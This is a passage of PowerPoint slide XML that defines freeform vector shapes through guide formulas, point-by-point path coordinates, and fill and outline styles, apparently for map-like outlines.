                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="4"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36110" name="Freeform 243"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2962" y="1904"/>
                <a:ext cx="160" cy="145"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 126 w 160"/>
                  <a:gd name="T1" fmla="*/ 141 h 145"/>
                  <a:gd name="T2" fmla="*/ 120 w 160"/>
                  <a:gd name="T3" fmla="*/ 135 h 145"/>
                  <a:gd name="T4" fmla="*/ 111 w 160"/>
                  <a:gd name="T5" fmla="*/ 137 h 145"/>
                  <a:gd name="T6" fmla="*/ 102 w 160"/>
                  <a:gd name="T7" fmla="*/ 136 h 145"/>
                  <a:gd name="T8" fmla="*/ 96 w 160"/>
                  <a:gd name="T9" fmla="*/ 140 h 145"/>
                  <a:gd name="T10" fmla="*/ 91 w 160"/>
                  <a:gd name="T11" fmla="*/ 141 h 145"/>
                  <a:gd name="T12" fmla="*/ 91 w 160"/>
                  <a:gd name="T13" fmla="*/ 136 h 145"/>
                  <a:gd name="T14" fmla="*/ 86 w 160"/>
                  <a:gd name="T15" fmla="*/ 132 h 145"/>
                  <a:gd name="T16" fmla="*/ 83 w 160"/>
                  <a:gd name="T17" fmla="*/ 133 h 145"/>
                  <a:gd name="T18" fmla="*/ 78 w 160"/>
                  <a:gd name="T19" fmla="*/ 134 h 145"/>
                  <a:gd name="T20" fmla="*/ 72 w 160"/>
                  <a:gd name="T21" fmla="*/ 128 h 145"/>
                  <a:gd name="T22" fmla="*/ 66 w 160"/>
                  <a:gd name="T23" fmla="*/ 122 h 145"/>
                  <a:gd name="T24" fmla="*/ 59 w 160"/>
                  <a:gd name="T25" fmla="*/ 122 h 145"/>
                  <a:gd name="T26" fmla="*/ 56 w 160"/>
                  <a:gd name="T27" fmla="*/ 117 h 145"/>
                  <a:gd name="T28" fmla="*/ 51 w 160"/>
                  <a:gd name="T29" fmla="*/ 113 h 145"/>
                  <a:gd name="T30" fmla="*/ 45 w 160"/>
                  <a:gd name="T31" fmla="*/ 112 h 145"/>
                  <a:gd name="T32" fmla="*/ 42 w 160"/>
                  <a:gd name="T33" fmla="*/ 119 h 145"/>
                  <a:gd name="T34" fmla="*/ 34 w 160"/>
                  <a:gd name="T35" fmla="*/ 111 h 145"/>
                  <a:gd name="T36" fmla="*/ 38 w 160"/>
                  <a:gd name="T37" fmla="*/ 107 h 145"/>
                  <a:gd name="T38" fmla="*/ 34 w 160"/>
                  <a:gd name="T39" fmla="*/ 105 h 145"/>
                  <a:gd name="T40" fmla="*/ 29 w 160"/>
                  <a:gd name="T41" fmla="*/ 105 h 145"/>
                  <a:gd name="T42" fmla="*/ 23 w 160"/>
                  <a:gd name="T43" fmla="*/ 102 h 145"/>
                  <a:gd name="T44" fmla="*/ 18 w 160"/>
                  <a:gd name="T45" fmla="*/ 96 h 145"/>
                  <a:gd name="T46" fmla="*/ 15 w 160"/>
                  <a:gd name="T47" fmla="*/ 98 h 145"/>
                  <a:gd name="T48" fmla="*/ 15 w 160"/>
                  <a:gd name="T49" fmla="*/ 92 h 145"/>
                  <a:gd name="T50" fmla="*/ 11 w 160"/>
                  <a:gd name="T51" fmla="*/ 81 h 145"/>
                  <a:gd name="T52" fmla="*/ 10 w 160"/>
                  <a:gd name="T53" fmla="*/ 74 h 145"/>
                  <a:gd name="T54" fmla="*/ 10 w 160"/>
                  <a:gd name="T55" fmla="*/ 66 h 145"/>
                  <a:gd name="T56" fmla="*/ 9 w 160"/>
                  <a:gd name="T57" fmla="*/ 58 h 145"/>
                  <a:gd name="T58" fmla="*/ 2 w 160"/>
                  <a:gd name="T59" fmla="*/ 48 h 145"/>
                  <a:gd name="T60" fmla="*/ 4 w 160"/>
                  <a:gd name="T61" fmla="*/ 30 h 145"/>
                  <a:gd name="T62" fmla="*/ 7 w 160"/>
                  <a:gd name="T63" fmla="*/ 29 h 145"/>
                  <a:gd name="T64" fmla="*/ 7 w 160"/>
                  <a:gd name="T65" fmla="*/ 24 h 145"/>
                  <a:gd name="T66" fmla="*/ 13 w 160"/>
                  <a:gd name="T67" fmla="*/ 20 h 145"/>
                  <a:gd name="T68" fmla="*/ 29 w 160"/>
                  <a:gd name="T69" fmla="*/ 16 h 145"/>
                  <a:gd name="T70" fmla="*/ 46 w 160"/>
                  <a:gd name="T71" fmla="*/ 5 h 145"/>
                  <a:gd name="T72" fmla="*/ 75 w 160"/>
                  <a:gd name="T73" fmla="*/ 5 h 145"/>
                  <a:gd name="T74" fmla="*/ 70 w 160"/>
                  <a:gd name="T75" fmla="*/ 5 h 145"/>
                  <a:gd name="T76" fmla="*/ 78 w 160"/>
                  <a:gd name="T77" fmla="*/ 13 h 145"/>
                  <a:gd name="T78" fmla="*/ 90 w 160"/>
                  <a:gd name="T79" fmla="*/ 7 h 145"/>
                  <a:gd name="T80" fmla="*/ 82 w 160"/>
                  <a:gd name="T81" fmla="*/ 15 h 145"/>
                  <a:gd name="T82" fmla="*/ 90 w 160"/>
                  <a:gd name="T83" fmla="*/ 11 h 145"/>
                  <a:gd name="T84" fmla="*/ 116 w 160"/>
                  <a:gd name="T85" fmla="*/ 9 h 145"/>
                  <a:gd name="T86" fmla="*/ 142 w 160"/>
                  <a:gd name="T87" fmla="*/ 8 h 145"/>
                  <a:gd name="T88" fmla="*/ 150 w 160"/>
                  <a:gd name="T89" fmla="*/ 19 h 145"/>
                  <a:gd name="T90" fmla="*/ 152 w 160"/>
                  <a:gd name="T91" fmla="*/ 25 h 145"/>
                  <a:gd name="T92" fmla="*/ 157 w 160"/>
                  <a:gd name="T93" fmla="*/ 52 h 145"/>
                  <a:gd name="T94" fmla="*/ 148 w 160"/>
                  <a:gd name="T95" fmla="*/ 58 h 145"/>
                  <a:gd name="T96" fmla="*/ 147 w 160"/>
                  <a:gd name="T97" fmla="*/ 65 h 145"/>
                  <a:gd name="T98" fmla="*/ 153 w 160"/>
                  <a:gd name="T99" fmla="*/ 70 h 145"/>
                  <a:gd name="T100" fmla="*/ 151 w 160"/>
                  <a:gd name="T101" fmla="*/ 84 h 145"/>
                  <a:gd name="T102" fmla="*/ 158 w 160"/>
                  <a:gd name="T103" fmla="*/ 98 h 145"/>
                  <a:gd name="T104" fmla="*/ 157 w 160"/>
                  <a:gd name="T105" fmla="*/ 102 h 145"/>
                  <a:gd name="T106" fmla="*/ 158 w 160"/>
                  <a:gd name="T107" fmla="*/ 112 h 145"/>
                  <a:gd name="T108" fmla="*/ 148 w 160"/>
                  <a:gd name="T109" fmla="*/ 118 h 145"/>
                  <a:gd name="T110" fmla="*/ 137 w 160"/>
                  <a:gd name="T111" fmla="*/ 141 h 145"/>
                  <a:gd name="T112" fmla="*/ 7 w 160"/>
                  <a:gd name="T113" fmla="*/ 23 h 145"/>
                  <a:gd name="T114" fmla="*/ 3 w 160"/>
                  <a:gd name="T115" fmla="*/ 24 h 145"/>
                  <a:gd name="T116" fmla="*/ 6 w 160"/>
                  <a:gd name="T117" fmla="*/ 22 h 145"/>
                  <a:gd name="T118" fmla="*/ 2 w 160"/>
                  <a:gd name="T119" fmla="*/ 22 h 145"/>
                  <a:gd name="T120" fmla="*/ 0 w 160"/>
                  <a:gd name="T121" fmla="*/ 22 h 145"/>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60"/>
                  <a:gd name="T184" fmla="*/ 0 h 145"/>
                  <a:gd name="T185" fmla="*/ 160 w 160"/>
                  <a:gd name="T186" fmla="*/ 145 h 145"/>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60" h="145">
                    <a:moveTo>
                      <a:pt x="135" y="145"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="129" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="145"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="7" y="23"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="23"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="0" y="22"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="22"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36111" name="Freeform 244"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2963" y="1904"/>
                <a:ext cx="159" cy="145"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 125 w 159"/>
                  <a:gd name="T1" fmla="*/ 141 h 145"/>
                  <a:gd name="T2" fmla="*/ 119 w 159"/>
                  <a:gd name="T3" fmla="*/ 135 h 145"/>
                  <a:gd name="T4" fmla="*/ 110 w 159"/>
                  <a:gd name="T5" fmla="*/ 137 h 145"/>
                  <a:gd name="T6" fmla="*/ 101 w 159"/>
                  <a:gd name="T7" fmla="*/ 136 h 145"/>
                  <a:gd name="T8" fmla="*/ 95 w 159"/>
                  <a:gd name="T9" fmla="*/ 140 h 145"/>
                  <a:gd name="T10" fmla="*/ 90 w 159"/>
                  <a:gd name="T11" fmla="*/ 141 h 145"/>
                  <a:gd name="T12" fmla="*/ 90 w 159"/>
                  <a:gd name="T13" fmla="*/ 136 h 145"/>
                  <a:gd name="T14" fmla="*/ 85 w 159"/>
                  <a:gd name="T15" fmla="*/ 132 h 145"/>
                  <a:gd name="T16" fmla="*/ 82 w 159"/>
                  <a:gd name="T17" fmla="*/ 133 h 145"/>
                  <a:gd name="T18" fmla="*/ 77 w 159"/>
                  <a:gd name="T19" fmla="*/ 134 h 145"/>
                  <a:gd name="T20" fmla="*/ 71 w 159"/>
                  <a:gd name="T21" fmla="*/ 128 h 145"/>
                  <a:gd name="T22" fmla="*/ 65 w 159"/>
                  <a:gd name="T23" fmla="*/ 122 h 145"/>
                  <a:gd name="T24" fmla="*/ 58 w 159"/>
                  <a:gd name="T25" fmla="*/ 122 h 145"/>
                  <a:gd name="T26" fmla="*/ 55 w 159"/>
                  <a:gd name="T27" fmla="*/ 117 h 145"/>
                  <a:gd name="T28" fmla="*/ 50 w 159"/>
                  <a:gd name="T29" fmla="*/ 113 h 145"/>
                  <a:gd name="T30" fmla="*/ 44 w 159"/>
                  <a:gd name="T31" fmla="*/ 112 h 145"/>
                  <a:gd name="T32" fmla="*/ 41 w 159"/>
                  <a:gd name="T33" fmla="*/ 119 h 145"/>
                  <a:gd name="T34" fmla="*/ 33 w 159"/>
                  <a:gd name="T35" fmla="*/ 111 h 145"/>
                  <a:gd name="T36" fmla="*/ 37 w 159"/>
                  <a:gd name="T37" fmla="*/ 107 h 145"/>
                  <a:gd name="T38" fmla="*/ 33 w 159"/>
                  <a:gd name="T39" fmla="*/ 105 h 145"/>
                  <a:gd name="T40" fmla="*/ 28 w 159"/>
                  <a:gd name="T41" fmla="*/ 105 h 145"/>
                  <a:gd name="T42" fmla="*/ 22 w 159"/>
                  <a:gd name="T43" fmla="*/ 102 h 145"/>
                  <a:gd name="T44" fmla="*/ 17 w 159"/>
                  <a:gd name="T45" fmla="*/ 96 h 145"/>
                  <a:gd name="T46" fmla="*/ 14 w 159"/>
                  <a:gd name="T47" fmla="*/ 98 h 145"/>
                  <a:gd name="T48" fmla="*/ 14 w 159"/>
                  <a:gd name="T49" fmla="*/ 92 h 145"/>
                  <a:gd name="T50" fmla="*/ 10 w 159"/>
                  <a:gd name="T51" fmla="*/ 81 h 145"/>
                  <a:gd name="T52" fmla="*/ 9 w 159"/>
                  <a:gd name="T53" fmla="*/ 74 h 145"/>
                  <a:gd name="T54" fmla="*/ 9 w 159"/>
                  <a:gd name="T55" fmla="*/ 66 h 145"/>
                  <a:gd name="T56" fmla="*/ 8 w 159"/>
                  <a:gd name="T57" fmla="*/ 58 h 145"/>
                  <a:gd name="T58" fmla="*/ 1 w 159"/>
                  <a:gd name="T59" fmla="*/ 48 h 145"/>
                  <a:gd name="T60" fmla="*/ 3 w 159"/>
                  <a:gd name="T61" fmla="*/ 30 h 145"/>
                  <a:gd name="T62" fmla="*/ 6 w 159"/>
                  <a:gd name="T63" fmla="*/ 29 h 145"/>
                  <a:gd name="T64" fmla="*/ 6 w 159"/>
                  <a:gd name="T65" fmla="*/ 24 h 145"/>
                  <a:gd name="T66" fmla="*/ 12 w 159"/>
                  <a:gd name="T67" fmla="*/ 20 h 145"/>
                  <a:gd name="T68" fmla="*/ 28 w 159"/>
                  <a:gd name="T69" fmla="*/ 16 h 145"/>
                  <a:gd name="T70" fmla="*/ 45 w 159"/>
                  <a:gd name="T71" fmla="*/ 5 h 145"/>
                  <a:gd name="T72" fmla="*/ 74 w 159"/>
                  <a:gd name="T73" fmla="*/ 5 h 145"/>
                  <a:gd name="T74" fmla="*/ 69 w 159"/>
                  <a:gd name="T75" fmla="*/ 5 h 145"/>
                  <a:gd name="T76" fmla="*/ 77 w 159"/>
                  <a:gd name="T77" fmla="*/ 13 h 145"/>
                  <a:gd name="T78" fmla="*/ 89 w 159"/>
                  <a:gd name="T79" fmla="*/ 7 h 145"/>
                  <a:gd name="T80" fmla="*/ 81 w 159"/>
                  <a:gd name="T81" fmla="*/ 15 h 145"/>
                  <a:gd name="T82" fmla="*/ 89 w 159"/>
                  <a:gd name="T83" fmla="*/ 11 h 145"/>
                  <a:gd name="T84" fmla="*/ 115 w 159"/>
                  <a:gd name="T85" fmla="*/ 9 h 145"/>
                  <a:gd name="T86" fmla="*/ 141 w 159"/>
                  <a:gd name="T87" fmla="*/ 8 h 145"/>
